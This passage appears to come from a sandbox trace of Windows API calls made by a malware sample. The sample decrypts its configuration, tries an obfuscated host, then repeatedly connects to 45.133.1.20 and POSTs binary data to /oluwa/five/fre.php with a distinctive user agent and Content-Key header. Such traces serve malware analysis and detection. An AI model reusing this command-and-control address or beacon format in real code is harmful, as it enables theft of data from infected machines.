| out: lpThreadId=0x19ff08*=0xc94) returned 0x31c [0167.867] Sleep (dwMilliseconds=0xea60) [0167.868] GetProcessHeap () returned 0x6a0000 [0167.868] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4d48 [0167.869] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0167.870] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0167.881] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0167.884] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bef48) returned 1 [0167.947] GetProcessHeap () returned 0x6a0000 [0167.947] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0c10 [0167.948] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0167.951] CryptImportKey (in: hProv=0x6bef48, pbData=0x6b0c10, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad4e0) returned 1 [0167.959] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0167.959] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0167.960] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0167.961] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0167.961] GetProcessHeap () returned 0x6a0000 [0167.961] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0c10 | out: hHeap=0x6a0000) returned 1 [0167.962] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0167.963] CryptDecrypt (in: hKey=0x6ad4e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4d48, pdwDataLen=0x19fcfc | out: pbData=0x6b4d48, pdwDataLen=0x19fcfc) returned 1 [0167.963] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0167.964] CryptDestroyKey (hKey=0x6ad4e0) returned 1 [0167.965] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0167.965] CryptReleaseContext (hProv=0x6bef48, dwFlags=0x0) returned 1 [0167.965] GetProcessHeap () returned 0x6a0000 [0167.965] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6b6de0 [0167.966] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0167.966] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0167.967] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0167.968] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0167.969] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0167.969] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0167.972] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0167.973] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0167.973] GetProcessHeap () returned 0x6a0000 [0167.973] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3670 [0167.973] getaddrinfo (in: pNodeName="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0167.974] GetProcessHeap () returned 0x6a0000 [0167.974] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3670 | out: hHeap=0x6a0000) returned 1 [0167.974] GetProcessHeap () returned 0x6a0000 [0167.974] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b6de0 | out: hHeap=0x6a0000) returned 1 [0167.975] GetProcessHeap () returned 0x6a0000 [0167.975] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4d48 | out: hHeap=0x6a0000) returned 1 [0167.975] GetProcessHeap () returned 0x6a0000 [0167.975] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b49a0 [0167.976] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0167.977] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0167.995] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0167.996] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bec18) returned 1 [0168.003] GetProcessHeap () returned 0x6a0000 [0168.003] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0c10 [0168.004] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0168.004] CryptImportKey (in: hProv=0x6bec18, pbData=0x6b0c10, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad020) returned 1 [0168.005] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0168.005] CryptSetKeyParam (hKey=0x6ad020, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0168.006] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0168.006] CryptSetKeyParam (hKey=0x6ad020, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0168.006] GetProcessHeap () returned 0x6a0000 [0168.007] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0c10 | out: hHeap=0x6a0000) returned 1 [0168.007] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0168.008] CryptDecrypt (in: hKey=0x6ad020, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b49a0, pdwDataLen=0x19fcfc | out: pbData=0x6b49a0, pdwDataLen=0x19fcfc) returned 1 [0168.009] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0168.009] CryptDestroyKey (hKey=0x6ad020) returned 1 [0168.010] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0168.010] CryptReleaseContext (hProv=0x6bec18, dwFlags=0x0) returned 1 [0168.010] GetProcessHeap () returned 0x6a0000 [0168.011] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6b6de0 [0168.011] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0168.012] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="http://") returned 0x0 [0168.012] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0168.012] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="https://") returned 0x0 [0168.013] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0168.015] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="/") returned="/oluwa/five/fre.php" [0168.016] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0168.016] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch=":") returned 0x0 [0168.016] GetProcessHeap () returned 0x6a0000 [0168.017] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3670 [0168.033] getaddrinfo (in: pNodeName="45.133.1.20", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6b9960*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6be868*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) returned 0 [0168.033] GetProcessHeap () returned 0x6a0000 [0168.033] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x6baab0 [0168.033] socket (af=2, type=1, protocol=6) returned 0x320 [0168.033] connect (s=0x320, name=0x6be868*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), namelen=16) returned 0 [0168.064] FreeAddrInfoW (pAddrInfo=0x6b9960*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6be868*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) [0168.064] GetProcessHeap () returned 0x6a0000 [0168.064] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x7d) returned 0x6beb90 [0168.064] GetProcessHeap () returned 0x6a0000 [0168.064] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x201b) returned 0x6c4710 [0168.065] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0168.066] wvsprintfA (in: param_1=0x6c4710, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0168.066] GetProcessHeap () returned 0x6a0000 [0168.066] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb3) returned 0x6bbc60 [0168.066] GetProcessHeap () returned 0x6a0000 [0168.066] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c4710 | out: hHeap=0x6a0000) returned 1 [0168.067] GetProcessHeap () returned 0x6a0000 [0168.067] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3e) returned 0x6b4a30 [0168.067] GetProcessHeap () returned 0x6a0000 [0168.067] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1fdc) returned 0x6c4710 [0168.067] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0168.068] wvsprintfA (in: param_1=0x6c4710, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 2D36A626\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0168.068] GetProcessHeap () returned 0x6a0000 [0168.068] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xf4) returned 0x6bbd20 [0168.068] GetProcessHeap () returned 0x6a0000 [0168.069] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c4710 | out: hHeap=0x6a0000) returned 1 [0168.069] send (s=0x320, buf=0x6bbd20*, len=242, flags=0) returned 242 [0168.069] send (s=0x320, buf=0x6bb998*, len=159, flags=0) returned 159 [0168.070] GetProcessHeap () returned 0x6a0000 [0168.070] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xfd0) returned 0x6bf370 [0168.070] recv (in: s=0x320, buf=0x6bf370, len=4048, flags=0 | out: buf=0x6bf370*) returned 204 [0168.158] GetProcessHeap () returned 0x6a0000 [0168.158] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bbd20 | out: hHeap=0x6a0000) returned 1 [0168.158] GetProcessHeap () returned 0x6a0000 [0168.159] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4a30 | out: hHeap=0x6a0000) returned 1 [0168.159] GetProcessHeap () returned 0x6a0000 [0168.159] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bbc60 | out: hHeap=0x6a0000) returned 1 [0168.160] GetProcessHeap () returned 0x6a0000 [0168.161] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6beb90 | out: hHeap=0x6a0000) returned 1 [0168.161] closesocket (s=0x320) returned 0 [0168.162] GetProcessHeap () returned 0x6a0000 [0168.162] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6baab0 | out: hHeap=0x6a0000) returned 1 [0168.162] GetProcessHeap () returned 0x6a0000 [0168.163] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b6de0 | out: hHeap=0x6a0000) returned 1 [0168.163] GetProcessHeap () returned 0x6a0000 [0168.163] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b49a0 | out: hHeap=0x6a0000) returned 1 [0168.163] GetProcessHeap () returned 0x6a0000 [0168.163] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3670 | out: hHeap=0x6a0000) returned 1 [0168.163] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6bf370, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x6d8) returned 0x320 [0168.166] Sleep (dwMilliseconds=0xea60) [0168.169] GetProcessHeap () returned 0x6a0000 [0168.169] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b49a0 [0168.170] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0168.170] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0168.177] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0168.177] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bf278) returned 1 [0168.191] GetProcessHeap () returned 0x6a0000 [0168.191] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0af0 [0168.192] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0168.194] CryptImportKey (in: hProv=0x6bf278, pbData=0x6b0af0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad4e0) returned 1 [0168.195] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0168.196] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0168.196] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0168.197] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0168.197] GetProcessHeap () returned 0x6a0000 [0168.197] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0af0 | out: hHeap=0x6a0000) returned 1 [0168.198] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0168.199] CryptDecrypt (in: hKey=0x6ad4e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b49a0, pdwDataLen=0x19fcfc | out: pbData=0x6b49a0, pdwDataLen=0x19fcfc) returned 1 [0168.200] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0168.200] CryptDestroyKey (hKey=0x6ad4e0) returned 1 [0168.201] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0168.201] CryptReleaseContext (hProv=0x6bf278, dwFlags=0x0) returned 1 [0168.201] GetProcessHeap () returned 0x6a0000 [0168.201] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6b6de0 [0168.202] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0168.211] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0168.211] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0168.212] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0168.212] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0168.212] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0168.213] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0168.213] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0168.213] GetProcessHeap () returned 0x6a0000 [0168.213] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3670 [0168.214] getaddrinfo (in: pNodeName="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0168.214] GetProcessHeap () returned 0x6a0000 [0168.214] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3670 | out: hHeap=0x6a0000) returned 1 [0168.214] GetProcessHeap () returned 0x6a0000 [0168.215] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b6de0 | out: hHeap=0x6a0000) returned 1 [0168.215] GetProcessHeap () returned 0x6a0000 [0168.215] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b49a0 | out: hHeap=0x6a0000) returned 1 [0168.215] GetProcessHeap () returned 0x6a0000 [0168.216] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b49a0 [0168.216] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0168.216] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0168.222] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0168.222] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bf168) returned 1 [0168.231] GetProcessHeap () returned 0x6a0000 [0168.231] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0c10 [0168.232] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0168.232] CryptImportKey (in: hProv=0x6bf168, pbData=0x6b0c10, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad4e0) returned 1 [0168.233] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0168.233] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0168.234] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0168.234] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0168.234] GetProcessHeap () returned 0x6a0000 [0168.235] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0c10 | out: hHeap=0x6a0000) returned 1 [0168.236] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0168.236] CryptDecrypt (in: hKey=0x6ad4e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b49a0, pdwDataLen=0x19fcfc | out: pbData=0x6b49a0, pdwDataLen=0x19fcfc) returned 1 [0168.237] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0168.237] CryptDestroyKey (hKey=0x6ad4e0) returned 1 [0168.240] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0168.240] CryptReleaseContext (hProv=0x6bf168, dwFlags=0x0) returned 1 [0168.240] GetProcessHeap () returned 0x6a0000 [0168.240] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6b6de0 [0168.241] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0168.241] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="http://") returned 0x0 [0168.242] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0168.242] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="https://") returned 0x0 [0168.243] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0168.243] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="/") returned="/oluwa/five/fre.php" [0168.244] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0168.244] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch=":") returned 0x0 [0168.244] GetProcessHeap () returned 0x6a0000 [0168.244] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3800 [0168.244] getaddrinfo (in: pNodeName="45.133.1.20", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6b9d48*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6be928*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) returned 0 [0168.245] GetProcessHeap () returned 0x6a0000 [0168.245] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x6ba990 [0168.245] socket (af=2, type=1, protocol=6) returned 0x324 [0168.245] connect (s=0x324, name=0x6be928*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), namelen=16) returned 0 [0168.275] FreeAddrInfoW (pAddrInfo=0x6b9d48*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6be928*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) [0168.275] GetProcessHeap () returned 0x6a0000 [0168.275] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x7d) returned 0x6bf278 [0168.275] GetProcessHeap () returned 0x6a0000 [0168.275] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x201b) returned 0x6c4710 [0168.276] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0168.277] wvsprintfA (in: param_1=0x6c4710, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0168.277] GetProcessHeap () returned 0x6a0000 [0168.277] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb3) returned 0x6bbc60 [0168.277] GetProcessHeap () returned 0x6a0000 [0168.277] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c4710 | out: hHeap=0x6a0000) returned 1 [0168.277] GetProcessHeap () returned 0x6a0000 [0168.277] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3e) returned 0x6b4d48 [0168.277] GetProcessHeap () returned 0x6a0000 [0168.277] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1fdc) returned 0x6c4710 [0168.278] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0168.279] wvsprintfA (in: param_1=0x6c4710, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 2D36A626\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0168.279] GetProcessHeap () returned 0x6a0000 [0168.279] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xf4) returned 0x6bbd20 [0168.279] GetProcessHeap () returned 0x6a0000 [0168.280] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c4710 | out: hHeap=0x6a0000) returned 1 [0168.280] send (s=0x324, buf=0x6bbd20*, len=242, flags=0) returned 242 [0168.282] send (s=0x324, buf=0x6bb998*, len=159, flags=0) returned 159 [0168.283] GetProcessHeap () returned 0x6a0000 [0168.283] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xfd0) returned 0x6bf370 [0168.283] recv (in: s=0x324, buf=0x6bf370, len=4048, flags=0 | out: buf=0x6bf370*) returned 204 [0168.362] GetProcessHeap () returned 0x6a0000 [0168.362] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bbd20 | out: hHeap=0x6a0000) returned 1 [0168.363] GetProcessHeap () returned 0x6a0000 [0168.363] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4d48 | out: hHeap=0x6a0000) returned 1 [0168.363] GetProcessHeap () returned 0x6a0000 [0168.363] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bbc60 | out: hHeap=0x6a0000) returned 1 [0168.363] GetProcessHeap () returned 0x6a0000 [0168.363] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bf278 | out: hHeap=0x6a0000) returned 1 [0168.363] closesocket (s=0x324) returned 0 [0168.365] GetProcessHeap () returned 0x6a0000 [0168.365] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6ba990 | out: hHeap=0x6a0000) returned 1 [0168.365] GetProcessHeap () returned 0x6a0000 [0168.365] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b6de0 | out: hHeap=0x6a0000) returned 1 [0168.365] GetProcessHeap () returned 0x6a0000 [0168.366] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b49a0 | out: hHeap=0x6a0000) returned 1 [0168.366] GetProcessHeap () returned 0x6a0000 [0168.366] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3800 | out: hHeap=0x6a0000) returned 1 [0168.366] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6bf370, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x7dc) returned 0x324 [0168.368] Sleep (dwMilliseconds=0xea60) [0168.382] GetProcessHeap () returned 0x6a0000 [0168.382] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4d48 [0168.384] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0168.384] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0168.394] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0168.394] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bf278) returned 1 [0168.401] GetProcessHeap () returned 0x6a0000 [0168.401] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6ba028 [0168.402] LoadLibraryW 